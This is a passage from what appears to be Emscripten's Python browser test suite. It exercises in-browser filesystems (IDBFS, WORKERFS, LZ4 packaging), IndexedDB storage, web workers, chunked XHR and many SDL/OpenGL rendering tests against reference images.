FS.mkdir('/working1');
FS.mount(IDBFS, {}, '/working1');
FS.syncfs(true, function (err) {
if (err) throw err;
removeRunDependency('syncfs');
});
};
''')
args = ['--pre-js', 'pre.js', '-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-lidbfs.js', '-s', 'EXIT_RUNTIME=1']
secret = str(time.time())
self.btest(path_from_root('tests', 'fs', 'test_idbfs_fsync.c'), '1', force_c=True, args=args + ['-DFIRST', '-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_success']'''])
self.btest(path_from_root('tests', 'fs', 'test_idbfs_fsync.c'), '1', force_c=True, args=args + ['-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_success']'''])
@no_wasm_backend('emterpretify')
def test_fs_memfs_fsync(self):
args = ['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-s', 'EXIT_RUNTIME=1']
secret = str(time.time())
self.btest(path_from_root('tests', 'fs', 'test_memfs_fsync.c'), '1', force_c=True, args=args + ['-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main']'''])
def test_fs_workerfs_read(self):
secret = 'a' * 10
secret2 = 'b' * 10
create_test_file('pre.js', '''
var Module = {};
Module.preRun = function() {
var blob = new Blob(['%s']);
var file = new File(['%s'], 'file.txt');
FS.mkdir('/work');
FS.mount(WORKERFS, {
blobs: [{ name: 'blob.txt', data: blob }],
files: [file],
}, '/work');
};
''' % (secret, secret2))
self.btest(path_from_root('tests', 'fs', 'test_workerfs_read.c'), '1', force_c=True, args=['-lworkerfs.js', '--pre-js', 'pre.js', '-DSECRET=\"' + secret + '\"', '-DSECRET2=\"' + secret2 + '\"', '--proxy-to-worker'])
def test_fs_workerfs_package(self):
create_test_file('file1.txt', 'first')
if not os.path.exists('sub'):
os.makedirs('sub')
open(os.path.join('sub', 'file2.txt'), 'w').write('second')
run_process([PYTHON, FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', os.path.join('sub', 'file2.txt'), '--separate-metadata', '--js-output=files.js'])
self.btest(os.path.join('fs', 'test_workerfs_package.cpp'), '1', args=['-lworkerfs.js', '--proxy-to-worker'])
def test_fs_lz4fs_package(self):
# generate data
self.clear()
os.mkdir('subdir')
create_test_file('file1.txt', '0123456789' * (1024 * 128))
open(os.path.join('subdir', 'file2.txt'), 'w').write('1234567890' * (1024 * 128))
random_data = bytearray(random.randint(0, 255) for x in range(1024 * 128 * 10 + 1))
random_data[17] = ord('X')
open('file3.txt', 'wb').write(random_data)
# compress in emcc, -s LZ4=1 tells it to tell the file packager
print('emcc-normal')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['-s', 'LZ4=1', '--preload-file', 'file1.txt', '--preload-file', 'subdir/file2.txt', '--preload-file', 'file3.txt'], timeout=60)
assert os.path.getsize('file1.txt') + os.path.getsize(os.path.join('subdir', 'file2.txt')) + os.path.getsize('file3.txt') == 3 * 1024 * 128 * 10 + 1
assert os.path.getsize('test.data') < (3 * 1024 * 128 * 10) / 2 # over half is gone
print(' emcc-opts')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['-s', 'LZ4=1', '--preload-file', 'file1.txt', '--preload-file', 'subdir/file2.txt', '--preload-file', 'file3.txt', '-O2'], timeout=60)
# compress in the file packager, on the server. the client receives compressed data and can just use it. this is typical usage
print('normal')
out = subprocess.check_output([PYTHON, FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', 'subdir/file2.txt', 'file3.txt', '--lz4'])
open('files.js', 'wb').write(out)
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM=1'], timeout=60)
print(' opts')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM=1', '-O2'], timeout=60)
# load the data into LZ4FS manually at runtime. This means we compress on the client. This is generally not recommended
print('manual')
subprocess.check_output([PYTHON, FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', 'subdir/file2.txt', 'file3.txt', '--separate-metadata', '--js-output=files.js'])
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM=1'], timeout=60)
print(' opts')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM=1', '-O2'], timeout=60)
print(' opts+closure')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM=1', '-O2', '--closure', '1', '-g1'], timeout=60)
'''# non-lz4 for comparison
try:
os.mkdir('files')
except:
pass
shutil.copyfile('file1.txt', os.path.join('files', 'file1.txt'))
shutil.copyfile('file2.txt', os.path.join('files', 'file2.txt'))
shutil.copyfile('file3.txt', os.path.join('files', 'file3.txt'))
out = subprocess.check_output([PYTHON, FILE_PACKAGER, 'files.data', '--preload', 'files/file1.txt', 'files/file2.txt', 'files/file3.txt'])
open('files.js', 'wb').write(out)
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js'], timeout=60)'''
def test_separate_metadata_later(self):
# see issue #6654 - we need to handle separate-metadata both when we run before
# the main program, and when we are run later
create_test_file('data.dat', ' ')
run_process([PYTHON, FILE_PACKAGER, 'more.data', '--preload', 'data.dat', '--separate-metadata', '--js-output=more.js'])
self.btest(os.path.join('browser', 'separate_metadata_later.cpp'), '1', args=['-s', 'FORCE_FILESYSTEM=1'])
def test_idbstore(self):
secret = str(time.time())
for stage in [0, 1, 2, 3, 0, 1, 2, 0, 0, 1, 4, 2, 5]:
self.clear()
self.btest(path_from_root('tests', 'idbstore.c'), str(stage), force_c=True, args=['-lidbstore.js', '-DSTAGE=' + str(stage), '-DSECRET=\"' + secret + '\"'])
@no_wasm_backend('emterpretify')
def test_idbstore_sync(self):
secret = str(time.time())
self.clear()
self.btest(path_from_root('tests', 'idbstore_sync.c'), '6', force_c=True, args=['-lidbstore.js', '-DSECRET=\"' + secret + '\"', '-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '--memory-init-file', '1', '-O3', '-g2'])
@no_wasm_backend('emterpretify')
def test_idbstore_sync_worker(self):
secret = str(time.time())
self.clear()
self.btest(path_from_root('tests', 'idbstore_sync_worker.c'), '6', force_c=True, args=['-lidbstore.js', '-DSECRET=\"' + secret + '\"', '-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '--memory-init-file', '1', '-O3', '-g2', '--proxy-to-worker', '-s', 'TOTAL_MEMORY=80MB'])
def test_force_exit(self):
self.btest('force_exit.c', force_c=True, expected='17', args=['-s', 'EXIT_RUNTIME=1'])
def test_sdl_pumpevents(self):
# key events should be detected using SDL_PumpEvents
create_test_file('pre.js', '''
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
''')
self.btest('sdl_pumpevents.c', expected='7', args=['--pre-js', 'pre.js', '-lSDL', '-lGL'])
def test_sdl_canvas_size(self):
self.btest('sdl_canvas_size.c', expected='1',
args=['-O2', '--minify', '0', '--shell-file',
path_from_root('tests', 'sdl_canvas_size.html'), '-lSDL', '-lGL'])
@requires_graphics_hardware
def test_sdl_gl_read(self):
# SDL, OpenGL, readPixels
create_test_file('sdl_gl_read.c', self.with_report_result(open(path_from_root('tests', 'sdl_gl_read.c')).read()))
self.compile_btest(['sdl_gl_read.c', '-o', 'something.html', '-lSDL', '-lGL'])
self.run_browser('something.html', '.', '/report_result?1')
@requires_graphics_hardware
def test_sdl_gl_mapbuffers(self):
self.btest('sdl_gl_mapbuffers.c', expected='1', args=['-s', 'FULL_ES3=1', '-lSDL', '-lGL'],
message='You should see a blue triangle.')
@requires_graphics_hardware
def test_sdl_ogl(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_regal(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '--minify', '0', '--preload-file', 'screenshot.png', '-s', 'USE_REGAL=1', '-DUSE_REGAL', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_defaultmatrixmode(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl_defaultMatrixMode.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_p(self):
# Immediate mode with pointers
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl_p.c', reference='screenshot-gray.png', reference_slack=1,
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_proc_alias(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl_proc_alias.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '-g2', '-s', 'INLINING_LIMIT=1', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'])
@requires_graphics_hardware
def test_sdl_fog_simple(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_simple.c', reference='screenshot-fog-simple.png',
args=['-O2', '--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_negative(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_negative.c', reference='screenshot-fog-negative.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_density(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_density.c', reference='screenshot-fog-density.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_exp2(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_exp2.c', reference='screenshot-fog-exp2.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_linear(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_linear.c', reference='screenshot-fog-linear.png', reference_slack=1,
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_glfw(self):
self.btest('glfw.c', '1', args=['-s', 'LEGACY_GL_EMULATION=1', '-lglfw', '-lGL'])
self.btest('glfw.c', '1', args=['-s', 'LEGACY_GL_EMULATION=1', '-s', 'USE_GLFW=2', '-lglfw', '-lGL'])
def test_glfw_minimal(self):
self.btest('glfw_minimal.c', '1', args=['-lglfw', '-lGL'])
self.btest('glfw_minimal.c', '1', args=['-s', 'USE_GLFW=2', '-lglfw', '-lGL'])
def test_glfw_time(self):
self.btest('test_glfw_time.c', '1', args=['-s', 'USE_GLFW=3', '-lglfw', '-lGL'])
def _test_egl_base(self, *args):
create_test_file('test_egl.c', self.with_report_result(open(path_from_root('tests', 'test_egl.c')).read()))
self.compile_btest(['-O2', 'test_egl.c', '-o', 'page.html', '-lEGL', '-lGL'] + list(args))
self.run_browser('page.html', '', '/report_result?1')
@requires_graphics_hardware
def test_egl(self):
self._test_egl_base()
@requires_threads
@requires_graphics_hardware
def test_egl_with_proxy_to_pthread(self):
self._test_egl_base('-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'OFFSCREEN_FRAMEBUFFER=1')
def _test_egl_width_height_base(self, *args):
create_test_file('test_egl_width_height.c', self.with_report_result(open(path_from_root('tests', 'test_egl_width_height.c')).read()))
self.compile_btest(['-O2', 'test_egl_width_height.c', '-o', 'page.html', '-lEGL', '-lGL'] + list(args))
self.run_browser('page.html', 'Should print "(300, 150)" -- the size of the canvas in pixels', '/report_result?1')
def test_egl_width_height(self):
self._test_egl_width_height_base()
@requires_threads
def test_egl_width_height_with_proxy_to_pthread(self):
self._test_egl_width_height_base('-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD=1')
def do_test_worker(self, args=[]):
# Test running in a web worker
create_test_file('file.dat', 'data for worker')
html_file = open('main.html', 'w')
html_file.write('''
<html>
<body>
Worker Test
<script>
var worker = new Worker('worker.js');
worker.onmessage = function(event) {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?' + event.data);
xhr.send();
setTimeout(function() { window.close() }, 1000);
};
</script>
</body>
</html>
''' % self.port)
html_file.close()
for file_data in [1, 0]:
cmd = [PYTHON, EMCC, path_from_root('tests', 'hello_world_worker.cpp'), '-o', 'worker.js'] + (['--preload-file', 'file.dat'] if file_data else []) + args
print(cmd)
subprocess.check_call(cmd)
self.assertExists('worker.js')
self.run_browser('main.html', '', '/report_result?hello%20from%20worker,%20and%20:' + ('data%20for%20w' if file_data else '') + ':')
def test_worker(self):
self.do_test_worker()
self.assertContained('you should not see this text when in a worker!', run_js('worker.js')) # code should run standalone too
def test_chunked_synchronous_xhr(self):
main = 'chunked_sync_xhr.html'
worker_filename = "download_and_checksum_worker.js"
html_file = open(main, 'w')
html_file.write(r"""
<!doctype html>
<html>
<head><meta charset="utf-8"><title>Chunked XHR</title></head>
<html>
<body>
Chunked XHR Web Worker Test
<script>
var worker = new Worker(""" + json.dumps(worker_filename) + r""");
var buffer = [];
worker.onmessage = function(event) {
if (event.data.channel === "stdout") {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?' + event.data.line);
xhr.send();
setTimeout(function() { window.close() }, 1000);
} else {
if (event.data.trace) event.data.trace.split("\n").map(function(v) { console.error(v); });
if (event.data.line) {
console.error(event.data.line);
} else {
var v = event.data.char;
if (v == 10) {
var line = buffer.splice(0);
console.error(line = line.map(function(charCode){return String.fromCharCode(charCode);}).join(''));
} else {
buffer.push(v);
}
}
}
};
</script>
</body>
</html>
""" % self.port)
html_file.close()
c_source_filename = "checksummer.c"
prejs_filename = "worker_prejs.js"
prejs_file = open(prejs_filename, 'w')
prejs_file.write(r"""
if (typeof(Module) === "undefined") Module = {};
Module["arguments"] = ["/bigfile"];
Module["preInit"] = function() {
FS.createLazyFile('/', "bigfile", "http://localhost:11111/bogus_file_path", true, false);
};
var doTrace = true;
Module["print"] = function(s) { self.postMessage({channel: "stdout", line: s}); };
Module["printErr"] = function(s) { self.postMessage({channel: "stderr", char: s, trace: ((doTrace && s === 10) ? new Error().stack : null)}); doTrace = false; };
""")
prejs_file.close()
# vs. os.path.join(self.get_dir(), filename)
# vs. path_from_root('tests', 'hello_world_gles.c')
self.compile_btest([path_from_root('tests', c_source_filename), '-g', '-s', 'SMALL_XHR_CHUNKS=1', '-o', worker_filename,
'--pre-js', prejs_filename])
chunkSize = 1024
data = os.urandom(10 * chunkSize + 1) # 10 full chunks and one 1 byte chunk
checksum = zlib.adler32(data) & 0xffffffff # Python 2 compatibility: force bigint
server = multiprocessing.Process(target=test_chunked_synchronous_xhr_server, args=(True, chunkSize, data, checksum, self.port))
server.start()
self.run_browser(main, 'Chunked binary synchronous XHR in Web Workers!', '/report_result?' + str(checksum))
server.terminate()
# Avoid race condition on cleanup, wait a bit so that processes have released file locks so that test tearDown won't
# attempt to rmdir() files in use.
if WINDOWS:
time.sleep(2)
@requires_graphics_hardware
def test_glgears(self):
def test(args):
self.btest('hello_world_gles.c', reference='gears.png', reference_slack=3,
args=['-DHAVE_BUILTIN_SINCOS', '-lGL', '-lglut'] + args)
# test normally
test([])
# test that a program that doesn't use pthreads still works with with pthreads enabled
# (regression test for https://github.com/emscripten-core/emscripten/pull/8059#issuecomment-488105672)
test(['-s', 'USE_PTHREADS=1'])
@requires_graphics_hardware
def test_glgears_long(self):
for proxy in [0, 1]:
print('proxy', proxy)
self.btest('hello_world_gles.c', expected=list(map(str, range(30, 500))), args=['-DHAVE_BUILTIN_SINCOS', '-DLONGTEST', '-lGL', '-lglut'] + (['--proxy-to-worker'] if proxy else []), timeout=30)
@requires_graphics_hardware
def test_glgears_animation(self):
es2_suffix = ['', '_full', '_full_944']
for full_es2 in [0, 1, 2]:
print(full_es2)
self.compile_btest([path_from_root('tests', 'hello_world_gles%s.c' % es2_suffix[full_es2]), '-o', 'something.html',
'-DHAVE_BUILTIN_SINCOS', '-s', 'GL_TESTING=1', '-lGL', '-lglut',
'--shell-file', path_from_root('tests', 'hello_world_gles_shell.html')] +
(['-s', 'FULL_ES2=1'] if full_es2 else []))
self.run_browser('something.html', 'You should see animating gears.', '/report_gl_result?true')
@requires_graphics_hardware
def test_fulles2_sdlproc(self):
self.btest('full_es2_sdlproc.c', '1', args=['-s', 'GL_TESTING=1', '-DHAVE_BUILTIN_SINCOS', '-s', 'FULL_ES2=1', '-lGL', '-lSDL', '-lglut'])
@requires_graphics_hardware
def test_glgears_deriv(self):
self.btest('hello_world_gles_deriv.c', reference='gears.png', reference_slack=2,
args=['-DHAVE_BUILTIN_SINCOS', '-lGL', '-lglut'], outfile='something.html',
message='You should see animating gears.')
with open('something.html') as f:
assert 'gl-matrix' not in f.read(), 'Should not include glMatrix when not needed'
@requires_graphics_hardware
def test_glbook(self):
programs = self.get_library('glbook', [
os.path.join('Chapter_2', 'Hello_Triangle', 'CH02_HelloTriangle.bc'),
os.path.join('Chapter_8', 'Simple_VertexShader', 'CH08_SimpleVertexShader.bc'),
os.path.join('Chapter_9', 'Simple_Texture2D', 'CH09_SimpleTexture2D.bc'),
os.path.join('Chapter_9', 'Simple_TextureCubemap', 'CH09_TextureCubemap.bc'),
os.path.join('Chapter_9', 'TextureWrap', 'CH09_TextureWrap.bc'),
os.path.join('Chapter_10', 'MultiTexture', 'CH10_MultiTexture.bc'),
os.path.join('Chapter_13', 'ParticleSystem', 'CH13_ParticleSystem.bc'),
], configure=None)
def book_path(*pathelems):
return path_from_root('tests', 'glbook', *pathelems)
for program in programs:
print(program)
basename = os.path.basename(program)
args = ['-lGL', '-lEGL', '-lX11']
if basename == 'CH10_MultiTexture.bc':
shutil.copyfile(book_path('Chapter_10', 'MultiTexture', 'basemap.tga'), 'basemap.tga')
shutil.copyfile(book_path('Chapter_10', 'MultiTexture', 'lightmap.tga'), 'lightmap.tga')
args += ['--preload-file', 'basemap.tga', '--preload-file', 'lightmap.tga']
elif basename == 'CH13_ParticleSystem.bc':
shutil.copyfile(book_path('Chapter_13', 'ParticleSystem', 'smoke.tga'), 'smoke.tga')
args += ['--preload-file', 'smoke.tga', '-O2'] # test optimizations and closure here as well for more coverage
self.btest(program,
reference=book_path(basename.replace('.bc', '.png')),
args=args,
timeout=30)
@requires_graphics_hardware
def test_gles2_emulation(self):
shutil.copyfile(path_from_root('tests', 'glbook', 'Chapter_10', 'MultiTexture', 'basemap.tga'), 'basemap.tga')
shutil.copyfile(path_from_root('tests', 'glbook', 'Chapter_10', 'MultiTexture', 'lightmap.tga'), 'lightmap.tga')
shutil.copyfile(path_from_root('tests', 'glbook', 'Chapter_13', 'ParticleSystem', 'smoke.tga'), 'smoke.tga')
for source, reference in [
(os.path.join('glbook', 'Chapter_2', 'Hello_Triangle', 'Hello_Triangle_orig.c'), path_from_root('tests', 'glbook', 'CH02_HelloTriangle.png')),
# (os.path.join('glbook', 'Chapter_8', 'Simple_VertexShader', 'Simple_VertexShader_orig.c'), path_from_root('tests', 'glbook', 'CH08_SimpleVertexShader.png')), # XXX needs INT extension in WebGL
(os.path.join('glbook', 'Chapter_9', 'TextureWrap', 'TextureWrap_orig.c'), path_from_root('tests', 'glbook', 'CH09_TextureWrap.png')),
# (os.path.join('glbook', 'Chapter_9', 'Simple_TextureCubemap', 'Simple_TextureCubemap_orig.c'), path_from_root('tests', 'glbook', 'CH09_TextureCubemap.png')), # XXX needs INT extension in WebGL
(os.path.join('glbook', 'Chapter_9', 'Simple_Texture2D', 'Simple_Texture2D_orig.c'), path_from_root('tests', 'glbook', 'CH09_SimpleTexture2D.png')),
(os.path.join('glbook', 'Chapter_10', 'MultiTexture', 'MultiTexture_orig.c'), path_from_root('tests', 'glbook', 'CH10_MultiTexture.png')),
(os.path.join('glbook', 'Chapter_13', 'ParticleSystem', 'ParticleSystem_orig.c'), path_from_root('tests', 'glbook', 'CH13_ParticleSystem.png')),
]:
print(source)
self.btest(source,
reference=reference,
args=['-I' + path_from_root('tests', 'glbook', 'Common'),
path_from_root('tests', 'glbook', 'Common', 'esUtil.c'),
path_from_root('tests', 'glbook', 'Common', 'esShader.c'),
path_from_root('tests', 'glbook', 'Common', 'esShapes.c'),
path_from_root('tests', 'glbook', 'Common', 'esTransform.c'),
'-s', 'FULL_ES2=1', '-lGL', '-lEGL', '-lX11',
'--preload-file', 'basemap.tga', '--preload-file', 'lightmap.tga', '--preload-file', 'smoke.tga'])
@requires_graphics_hardware
def test_clientside_vertex_arrays_es3(self):
# NOTE: Should FULL_ES3=1 imply client-side vertex arrays? The emulation needs FULL_ES2=1 for now.
self.btest('clientside_vertex_arrays_es3.c', reference='gl_triangle.png', args=['-s', 'USE_WEBGL2=1', '-s', 'FULL_ES2=1', '-s', 'FULL_ES3=1', '-s', 'USE_GLFW=3', '-lglfw', '-lGLESv2'])
def test_emscripten_api(self):
self.btest('emscripten_api_browser.cpp', '1', args=['-s', '''EXPORTED_FUNCTIONS=['_main', '_third']''', '-lSDL'])
def test_emscripten_api2(self):
def setup():
create_test_file('script1.js', '''
Module._set(456);
''')
create_test_file('file1.txt', 'first')
create_test_file('file2.txt', 'second')
setup()
run_process([PYTHON, FILE_PACKAGER, 'test.data', '--preload', 'file1.txt', 'file2.txt'], stdout=open('script2.js', 'w'))
self.btest('emscripten_api_browser2.cpp', '1', args=['-s', '''EXPORTED_FUNCTIONS=['_main', '_set']''', '-s', 'FORCE_FILESYSTEM=1'])
# check using file packager to another dir
self.clear()
setup()
os.mkdir('sub')
run_process([PYTHON, FILE_PACKAGER, 'sub/test.data', '--preload', 'file1.txt', 'file2.txt'], stdout=open('script2.js', 'w'))
shutil.copyfile(os.path.join('sub', 'test.data'), 'test.data')
self.btest('emscripten_api_browser2.cpp', '1', args=['-s', '''EXPORTED_FUNCTIONS=['_main', '_set']''', '-s', 'FORCE_FILESYSTEM=1'])
def test_emscripten_api_infloop(self):
self.btest('emscripten_api_browser_infloop.cpp', '7')
def test_emscripten_fs_api(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png') # preloaded *after* run
self.btest('emscripten_fs_api_browser.cpp', '1', args=['-lSDL'])
def test_emscripten_fs_api2(self):
self.btest('emscripten_fs_api_browser2.cpp', '1', args=['-s', "ASSERTIONS=0"])
self.btest('emscripten_fs_api_browser2.cpp', '1', args=['-s', "ASSERTIONS=1"])
@requires_threads
def test_emscripten_main_loop(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'EXIT_RUNTIME=1']]:
self.btest('emscripten_main_loop.cpp', '0', args=args)
@requires_threads
def test_emscripten_main_loop_settimeout(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1']]:
self.btest('emscripten_main_loop_settimeout.cpp', '1', args=args)
@requires_threads
def test_emscripten_main_loop_and_blocker(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1']]:
self.btest('emscripten_main_loop_and_blocker.cpp', '0', args=args)
@requires_threads
def test_emscripten_main_loop_setimmediate(self):
for args in [[], ['--proxy-to-worker'], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1']]:
self.btest('emscripten_main_loop_setimmediate.cpp', '1', args=args)
def test_fs_after_main(self):
for args in [[], ['-O1']]:
self.btest('fs_after_main.cpp', '0', args=args)
def test_sdl_quit(self):
self.btest('sdl_quit.c', '1', args=['-lSDL', '-lGL'])
def test_sdl_resize(self):
self.btest('sdl_resize.c', '1', args=['-lSDL', '-lGL'])
def test_glshaderinfo(self):
self.btest('glshaderinfo.cpp', '1', args=['-lGL', '-lglut'])
@requires_graphics_hardware
def test_glgetattachedshaders(self):
self.btest('glgetattachedshaders.c', '1', args=['-lGL', '-lEGL'])
# Covered by dEQP text suite (we can remove it later if we add coverage for that).
@requires_graphics_hardware
def test_glframebufferattachmentinfo(self):
self.btest('glframebufferattachmentinfo.c', '1', args=['-lGLESv2', '-lEGL'])
@requires_graphics_hardware
def test_sdlglshader(self):
self.btest('sdlglshader.c', reference='sdlglshader.png', args=['-O2', '--closure', '1', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_sdlglshader2(self):
self.btest('sdlglshader2.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_gl_glteximage(self):
self.btest('gl_teximage.c', '1', args=['-lGL', '-lSDL'])
@requires_graphics_hardware
@requires_threads
def test_gl_textures(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1']]:
self.btest('gl_textures.cpp', '0', args=['-lGL'])
@requires_graphics_hardware
def test_gl_ps(self):
# pointers and a shader
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('gl_ps.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1)
@requires_graphics_hardware
def test_gl_ps_packed(self):
# packed data that needs to be strided
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('gl_ps_packed.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1)
@requires_graphics_hardware
def test_gl_ps_strides(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('gl_ps_strides.c', reference='gl_ps_strides.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '--use-preload-plugins'])
@requires_graphics_hardware
def test_gl_ps_worker(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('gl_ps_worker.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1, also_proxied=True)
@requires_graphics_hardware
def test_gl_renderers(self):
self.btest('gl_renderers.c', reference='gl_renderers.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_gl_stride(self):
self.btest('gl_stride.c', reference='gl_stride.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_gl_vertex_buffer_pre(self):
self.btest('gl_vertex_buffer_pre.c', reference='gl_vertex_buffer_pre.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_gl_vertex_buffer(self):
self.btest('gl_vertex_buffer.c', reference='gl_vertex_buffer.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], reference_slack=1)
@requires_graphics_hardware
def test_gles2_uniform_arrays(self):
self.btest('gles2_uniform_arrays.cpp', args=['-s', 'GL_ASSERTIONS=1', '-lGL', '-lSDL'], expected=['1'], also_proxied=True)
@requires_graphics_hardware
def test_gles2_conformance(self):
self.btest('gles2_conformance.cpp', args=['-s', 'GL_ASSERTIONS=1', '-lGL', '-lSDL'], expected=['1'])
@requires_graphics_hardware
def test_matrix_identity(self):
self.btest('gl_matrix_identity.c', expected=['-1882984448', '460451840', '1588195328'], args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
